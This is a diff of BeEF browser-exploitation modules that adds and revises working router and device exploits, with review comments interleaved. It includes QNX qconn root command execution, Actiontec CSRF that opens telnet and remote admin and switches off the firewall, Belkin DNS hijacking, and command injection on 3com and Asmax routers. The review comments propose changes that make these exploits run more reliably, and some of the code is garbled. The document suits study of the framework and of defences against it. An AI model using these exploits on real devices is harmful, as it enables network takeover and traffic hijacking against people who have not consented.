+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Php_dos < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'url', 'ui_label' => 'Target URL', 'type' => 'textarea', 'value' =>'http://example.com/index.php', 'width' => '400px', 'height' => '50px'}
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['result'] = @datastore['result'] if not @datastore['result'].nil?
+ content['fail'] = @datastore['fail'] if not @datastore['fail'].nil?
+ save content
+ end
+
+end
+
diff --git a/modules/exploits/qnx_qconn_command_execution/command.js b/modules/exploits/qnx_qconn_command_execution/command.js
new file mode 100644
index 000000000..7a5cb0290
--- /dev/null
+++ b/modules/exploits/qnx_qconn_command_execution/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var rhost = '<%= @rhost %>';
+ var rport = '<%= @rport %>';
+ var timeout = '<%= @timeout %>';
+
+ // validate payload
+ try {
+ var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+ var payload = '\r\nservice launcher\r\nstart/flags run /bin/sh /bin/sh -c "'+cmd+'"\r\n'
+ } catch(e) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+ return;
+ }
+
+ // validate target details
+ if (!rport || !rhost || isNaN(rport)) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+ return;
+ }
+ if (rport > 65535 || rport < 0) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+ return;
+ }
+
+ // send commands
+ var qnx_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ // clean up
+ cleanup = function() {
+ document.body.removeChild(qnx_iframe_<%= @command_id %>);
+ }
+ setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/qnx_qconn_command_execution/config.yaml b/modules/exploits/qnx_qconn_command_execution/config.yaml
new file mode 100644
index 000000000..15bcba951
--- /dev/null
+++ b/modules/exploits/qnx_qconn_command_execution/config.yaml
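Review bot: A `"` in `@cmd` still reaches the shell unescaped: the template turns it into `\"` in the JS source, the single-quoted literal decodes that back to a bare `"`, and `payload` then places it inside `/bin/sh -c "…"`, where it ends the quoted string early (`$` and backticks are expanded there as well). Escape for the shell layer after the literal is built, e.g. `cmd = cmd.replace(/(["\\$])/g, '\\$1');` before `payload` is assembled, and treat backticks the same way. The try/catch around `var cmd` cannot do what its comment promises — a value that breaks the literal is a syntax error in the entire `beef.execute` callback, which fails before any line of it runs — so that block is dead weight and the comment is misleading. The port check also admits 0: `if (rport > 65535 || rport < 1)`.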
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ qnx_qconn_command_execution:
+ enable: true
+ category: "Exploits"
+ name: "QNX QCONN Command Execution"
+ description: "This module exploits a vulnerability in the qconn component of QNX Neutrino which can be abused to allow unauthenticated users to execute arbitrary commands under the context of the 'root' user.

The results of the commands are not returned to BeEF."
+ authors: ["bcoles"]
+ target:
+ working: ["FF", "C", "O"]
+ not_working: ["S", "IE"]
diff --git a/modules/exploits/qnx_qconn_command_execution/module.rb b/modules/exploits/qnx_qconn_command_execution/module.rb
new file mode 100644
index 000000000..2a3f8cb5d
--- /dev/null
+++ b/modules/exploits/qnx_qconn_command_execution/module.rb
@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Qnx_qconn_command_execution < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+ {'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '8000'},
+ {'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+ {'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute.', 'type'=>'textarea', 'value'=>'(echo Welcome to BeEF!) > /etc/motd', 'width'=>'200px' },
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+ save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
+ end
+
+end
diff --git a/modules/exploits/router/3com_officeconnect_cmd_exec/command.js b/modules/exploits/router/3com_officeconnect_cmd_exec/command.js
index b8e6c556a..5f36c9bd6 100644
--- a/modules/exploits/router/3com_officeconnect_cmd_exec/command.js
+++ b/modules/exploits/router/3com_officeconnect_cmd_exec/command.js
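Review bot: `post_execute` calls `save` twice when both `result` and `fail` are present; if each call persists its own row, one execution shows up as two results in the UI. `php-5.3.9-dos/module.rb` in the same commit handles the same two keys by collecting them into a single hash and calling `save content` once — reuse that shape here so the two modules agree. The default `rhost` of `127.0.0.1` is resolved by the hooked browser, not by the BeEF host, since the IPEC form is built client-side; a short `'description'` on that option would spare the operator the surprise.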
@@ -1,25 +1,17 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 var gateway = '<%= @base %>';
 var path = 'utility.cgi';
 var cmd = '<%= @cmd %>';
+ var timeout = 15;
 
- var com_officeconnect_iframe = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
+ var com_officeconnect_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
 {'type':'hidden', 'name':'testType', 'value':'1'},
 {'type':'hidden', 'name':'IP', 'value':'||'+cmd}
 ]);
@@ -27,9 +19,9 @@ beef.execute(function() {
 beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
 cleanup = function() {
- document.body.removeChild(com_officeconnect_iframe);
+ document.body.removeChild(com_officeconnect_iframe_<%= @command_id %>);
 }
- setTimeout("cleanup()", 15000);
+ setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml b/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml
index 157669422..03f13e41d 100644
--- a/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml
+++ b/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml
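Review bot: `var cmd = '<%= @cmd %>';` is still interpolated unescaped in this hunk's context, while the new dlink module in the same commit escapes `'` and `"` for the very same option; a command containing `'` breaks the generated script and the 3com module silently never fires. Bring it in line: `var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';`. In the second hunk `cleanup` remains an implicit global shared with every module that uses this idiom, so the new per-command suffix on the iframe only half-solves the overlap problem — `setTim
eout(function() { document.body.removeChild(com_officeconnect_iframe_<%= @command_id %>); }, timeout*1000);` closes the gap without the string-eval form.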
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb b/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb
index 675efdd36..7d7af686c 100644
--- a/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb
+++ b/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Com_officeconnect_cmd_exec < BeEF::Core::Command
 
diff --git a/modules/exploits/router/actiontec_q1000_csrf/command.js b/modules/exploits/router/actiontec_q1000_csrf/command.js
new file mode 100644
index 000000000..1a444473c
--- /dev/null
+++ b/modules/exploits/router/actiontec_q1000_csrf/command.js
@@ -0,0 +1,52 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var gateway = '<%= @base %>';
+ var user = '<%= @user %>';
+ var passwd = '<%= @password %>';
+ var port = '<%= @port %>';
+ var timeout = 15;
+
+ var actiontec_q1000_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotegui.cgi", "POST", [
+ {'type':'hidden', 'name':'serCtlHttp', 'value':'1'},
+ {'type':'hidden', 'name':'adminUserName', 'value':user},
+ {'type':'hidden', 'name':'adminPassword', 'value':passwd},
+ {'type':'hidden', 'name':'remGuiTimeout', 'value':'0'},
+ {'type':'hidden', 'name':'remGuiPort', 'value':port}
+ ]);
+
+ var actiontec_q1000_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotetelnet.cgi", "POST", [
+ {'type':'hidden', 'name':'serCtlTelnet', 'value':'1'},
+ {'type':'hidden', 'name':'remTelUser', 'value':user},
+ {'type':'hidden', 'name':'remTelPass', 'value':passwd},
+ {'type':'hidden', 'name':'remTelTimeout', 'value':'0'},
+ {'type':'hidden', 'name':'remTelPassChanged', 'value':'1'}
+ ]);
+
+ var actiontec_q1000_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_firewallsettings.cgi", "POST", [
+ {'type':'hidden', 'name':'fwLevel', 'value':'Basic'},
+ {'type':'hidden', 'name':'fwStealthMode', 'value':'0'}
+ ]);
+
+ var actiontec_q1000_iframe4_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "ipv6_firewallsettings.cgi", "POST", [
+ {'type':'hidden', 'name':'ipv6_fwlevel', 'value':'basic'},
+ {'type':'hidden', 'name':'ipv6_fwenable', 'value':'0'}
+ ]);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(actiontec_q1000_iframe1_<%= @command_id %>);
+
document.body.removeChild(actiontec_q1000_iframe2_<%= @command_id %>);
+ document.body.removeChild(actiontec_q1000_iframe3_<%= @command_id %>);
+ document.body.removeChild(actiontec_q1000_iframe4_<%= @command_id %>);
+ }
+ setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/router/actiontec_q1000_csrf/config.yaml b/modules/exploits/router/actiontec_q1000_csrf/config.yaml
new file mode 100644
index 000000000..be4b1634a
--- /dev/null
+++ b/modules/exploits/router/actiontec_q1000_csrf/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ actiontec_q1000_csrf:
+ enable: true
+ category: ["Exploits", "Router"]
+ name: "Actiontec Q1000 CSRF"
+ description: "Attempts to enable remote web and telnet administration, and disables the firewall on an Actiontec Q1000 router."
+ authors: ["james-otten"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/router/actiontec_q1000_csrf/module.rb b/modules/exploits/router/actiontec_q1000_csrf/module.rb
new file mode 100644
index 000000000..40000e2e4
--- /dev/null
+++ b/modules/exploits/router/actiontec_q1000_csrf/module.rb
@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Actiontec_q1000_csrf < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'},
+ {'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'admin'},
+ {'name' => 'password', 'ui_label' => 'Desired password', 'value' => 'BeEF'},
+ {'name' => 'port', 'ui_label' => 'Desired web ui port', 'value' => '443'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
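Review bot: `user`, `passwd` and `port` are interpolated into single-quoted JS literals with no escaping; `'Desired password'` is free text, and a value containing `'` or `\` turns the whole `beef.execute` body into a syntax error, so none of the four forms is submitted and no result is ever reported. The dlink module in this commit already shows the pattern to copy: `var passwd = '<%= @password.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';` (and likewise for `user`). The four forms are fired in one synchronous burst and nothing observes the outcome of any of them, which is worth a comment next to the `result=exploit attempted` send so the operator knows it is a best-effort report, not a confirmation that remote admin is on or the firewall is off.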
diff --git a/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js b/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js
index 4bf78dfec..9a7da976c 100644
--- a/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js
+++ b/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 var gateway = '<%= @base %>';
@@ -23,7 +14,7 @@ beef.execute(function() {
 img.setAttribute("style","visibility:hidden");
 img.setAttribute("width","0");
 img.setAttribute("height","0");
- img.id = 'asmax_ar804gu';
+ img.id = 'asmax_ar804gu_<%= @command_id %>';
 img.src = gateway+path+cmd;
 document.body.appendChild(img);
 
diff --git a/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml b/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml
index 44c2ca602..ab3b12fb0 100644
--- a/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml
+++ b/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb b/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb index f330c301c..55645a6cb 100644 --- a/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb +++ b/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Asmax_ar804gu_cmd_exec < BeEF::Core::Command 
diff --git a/modules/exploits/router/belkin_dns_csrf/command.js b/modules/exploits/router/belkin_dns_csrf/command.js new file mode 100644 index 000000000..1bea76e03 --- /dev/null +++ b/modules/exploits/router/belkin_dns_csrf/command.js 
@@ -0,0 +1,70 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ // config
+ var gateway = '<%= @base %>';
+ var path = '/cgi-bin/setup_dns.exe';
+ var dns = '<%= @dns %>';
+ var timeout = 15;
+
+ // validate DNS server IP address
+ var parts = dns.split('.');
+ if (parts.length != 4) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
+ return;
+ }
+ for (var i=0; i 255) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
+ return;
+ }
+ }
+ var dns_1 = parts[0];
+ var dns_2 = parts[1];
+ var dns_3 = parts[2];
+ var dns_4 = parts[3];
+
+ // attempt auth with default password (admin)
+ // incorrect login attempts do not log out an authenticated session
+ var img = new Image();
+ img.setAttribute("style", "visibility:hidden");
+ img.setAttribute("width", "0");
+ img.setAttribute("height","0");
+ img.id = 'belkin_auth_<%= @command_id %>';
+ img.src = gateway+"/cgi-bin/login.exe?pws=admin";
+ document.body.appendChild(img);
+
+ // change DNS
+ var belkin_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "POST", [
+ {'type':'hidden', 'name':'dns1_1', 'value':dns_1},
+ {'type':'hidden', 'name':'dns1_2', 'value':dns_2},
+ {'type':'hidden', 'name':'dns1_3', 'value':dns_3},
+ {'type':'hidden', 'name':'dns1_4', 'value':dns_4},
+ {'type':'hidden', 'name':'dns2_1', 'value':dns_1},
+ {'type':'hidden', 'name':'dns2_2', 'value':dns_2},
+ {'type':'hidden', 'name':'dns2_3', 'value':dns_3},
+ {'type':'hidden', 'name':'dns2_4', 'value':dns_4},
+ {'type':'hidden', 'name':'dns2_1_t', 'value':dns_1},
+ {'type':'hidden', 'name':'dns2_2_t', 'value':dns_2},
+ {'type':'hidden', 'name':'dns2_3_t', 'value':dns_3},
+ {'type':'hidden', 'name':'dns2_4_t', 
'value':dns_4},
+ {'type':'hidden', 'name':'auto_from_isp', 'value':'0'}
+ ]);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ // clean up
+ cleanup = function() {
+ document.body.removeChild(belkin_iframe_<%= @command_id %>);
+ document.body.removeChild(belkin_auth_<%= @command_id %>);
+ }
+ setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/router/belkin_dns_csrf/config.yaml b/modules/exploits/router/belkin_dns_csrf/config.yaml
new file mode 100644
index 000000000..9e8a27612
--- /dev/null
+++ b/modules/exploits/router/belkin_dns_csrf/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ belkin_dns_csrf:
+ enable: true
+ category: ["Exploits", "Router"]
+ name: "Belkin DNS Hijack CSRF"
+ description: "Attempts to change the DNS setting on a Belkin router.
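Review bot: `cleanup = function() { … }` near the end of the hunk assigns an implicit global, and `setTimeout("cleanup()", timeout*1000)` then evaluates a string to reach it; the commit made the iframe and image handles unique per command (`belkin_iframe_<%= @command_id %>`, `belkin_auth_<%= @command_id %>`) but left this one shared name, so two modules from this commit running in the same page within the 15-second window overwrite each other's handler and one set of elements is never removed. Declaring it locally and passing the function reference avoids both problems: `var cleanup = function() { … };` followed by `setTimeout(cleanup, timeout*1000);`. The same pattern appears in the bt_home_hub_csrf, cisco_e2400_csrf, comtrend_ct5367_csrf, comtrend_ct5624_csrf, dlink_dir_615_csrf, dlink_dsl500t_csrf and huawei_smartax_mt880 command.js hunks. The octet loop `for (var i=0; i 255) {` is garbled in this rendering, so its real condition cannot be checked here; since `dns.split('.')` yields strings, a range comparison alone would accept a non-numeric octet, and converting each part with `parseInt(parts[i], 10)` and rejecting `isNaN` results first would close that gap.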

Multiple models are affected, including F5D7230 and F1PI242EG, however this module has not been tested." + authors: ["bcoles"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/router/belkin_dns_csrf/module.rb b/modules/exploits/router/belkin_dns_csrf/module.rb new file mode 100644 index 000000000..2418dbfe0 --- /dev/null +++ b/modules/exploits/router/belkin_dns_csrf/module.rb @@ -0,0 +1,21 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +### +# This module has not been tested +### +class Belkin_dns_csrf < BeEF::Core::Command + + def self.options + return [ + {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, + {'name' => 'dns', 'ui_label' => 'DNS Server', 'value' => '8.8.8.8'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/router/bt_home_hub_csrf/command.js b/modules/exploits/router/bt_home_hub_csrf/command.js index d20374dbe..2ab008044 100644 --- a/modules/exploits/router/bt_home_hub_csrf/command.js +++ b/modules/exploits/router/bt_home_hub_csrf/command.js 
@@ -1,35 +1,26 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var gateway = '<%= @base %>'; - var passwd = '<%= @password %>'; + var passwd = '<%= @password %>'; + var timeout = 15; - - - var bt_home_hub_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST", - [{'type':'hidden', 'name':'0', 'value':'31'} , - {'type':'hidden', 'name':'1', 'value':''}, - {'type':'hidden', 'name':'30', 'value':passwd}]); + var bt_home_hub_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST", [ + {'type':'hidden', 'name':'0', 'value':'31'} , + {'type':'hidden', 'name':'1', 'value':''}, + {'type':'hidden', 'name':'30', 'value':passwd} + ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(bt_home_hub_iframe); + document.body.removeChild(bt_home_hub_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/bt_home_hub_csrf/config.yaml b/modules/exploits/router/bt_home_hub_csrf/config.yaml index 39034eba7..64c6468a0 100644 
--- a/modules/exploits/router/bt_home_hub_csrf/config.yaml +++ b/modules/exploits/router/bt_home_hub_csrf/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/bt_home_hub_csrf/module.rb b/modules/exploits/router/bt_home_hub_csrf/module.rb index a63a69876..23dac4cf4 100644 --- a/modules/exploits/router/bt_home_hub_csrf/module.rb +++ b/modules/exploits/router/bt_home_hub_csrf/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Bt_home_hub_csrf < BeEF::Core::Command diff --git a/modules/exploits/router/cisco_e2400_csrf/command.js b/modules/exploits/router/cisco_e2400_csrf/command.js index e3c548b0e..3a807e582 100644 --- a/modules/exploits/router/cisco_e2400_csrf/command.js +++ b/modules/exploits/router/cisco_e2400_csrf/command.js 
@@ -1,23 +1,15 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; + var timeout = 15; - var cisco_e2400_iframe1 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", + var cisco_e2400_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", [ {'type':'hidden', 'name':'submit_button', 'value':'Management'}, {'type':'hidden', 'name':'change_action', 'value':''}, @@ -46,7 +38,7 @@ beef.execute(function() { {'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'}, ]); - var cisco_e2400_iframe2 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", + var cisco_e2400_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", [ {'type':'hidden', 'name':'submit_button', 'value':'Firewall'}, {'type':'hidden', 'name':'change_action', 'value':''}, 
@@ -68,10 +60,10 @@ beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(cisco_e2400_iframe1); - document.body.removeChild(cisco_e2400_iframe2); + document.body.removeChild(cisco_e2400_iframe1_<%= @command_id %>); + document.body.removeChild(cisco_e2400_iframe2_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/cisco_e2400_csrf/config.yaml b/modules/exploits/router/cisco_e2400_csrf/config.yaml index 2b3e0c519..3602c11af 100644 --- a/modules/exploits/router/cisco_e2400_csrf/config.yaml +++ b/modules/exploits/router/cisco_e2400_csrf/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework 